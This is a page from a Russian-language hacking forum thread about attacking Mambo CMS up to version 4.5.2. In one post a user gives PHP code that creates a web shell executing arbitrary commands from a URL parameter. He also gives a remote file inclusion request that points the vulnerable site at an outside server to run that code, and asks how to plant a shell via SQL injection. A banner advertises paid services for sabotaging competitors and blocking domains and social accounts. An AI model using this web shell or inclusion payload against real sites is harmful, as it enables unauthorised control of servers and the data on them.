Mambo <=4.5.2

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Mambo <=4.5.2

Страница 2 из 2

Опции темы

Поиск в этой теме

Опции просмотра

#11

07.01.2006, 17:32

max_pain89

Постоянный

Регистрация: 11.12.2004

Сообщений: 592

С нами: 11269766

Репутация: 345

Цитата:

Сообщение от insidex

НЕТ! шел заливается на левый сервак,там этот файл и создается,иначе никак!
Бля,все равно не пашет,Неужели под Мамбу нету никаких пробивных эксплойтов?!

Я еще понимаю если это лол скажет, но ты то должен понимать блин, хочешь видео посмотри http://video.antichat.net/file13.html и тогда до себя дойдет, как работает include

#12

07.01.2006, 18:15

insidex

Познающий

Регистрация: 13.10.2005

Сообщений: 41

С нами: 10828756

Репутация: 1

Так еще раз, файл с содержимым

PHP код:


		
			


<?php

$fp=fopen("suntzu.php","w");

fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0);

system($HTTP_GET_VARS[cmd]);?>");

fclose($fp);

?>

заливается на левый сервак(на специальный адресс),а вот с помощью команды

PHP код:


		
			
http:////index.php?_REQUEST=&_REQUEST=com_content&_REQUEST=1&GLOBALS=&mosConfig_absolute_path=левый_сервак

код выполняется на серваке.
Вообщем хер сним,ибо у этотого экса значительные ограничения.

Еще раз,на мамбе последних версиях есть возможность проведения sql-i инъекций.Так вот как с их помощью чертов шелл зафигачить на сервер?

Страница 2 из 2

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Создать сделку

Мои сделки

Сделка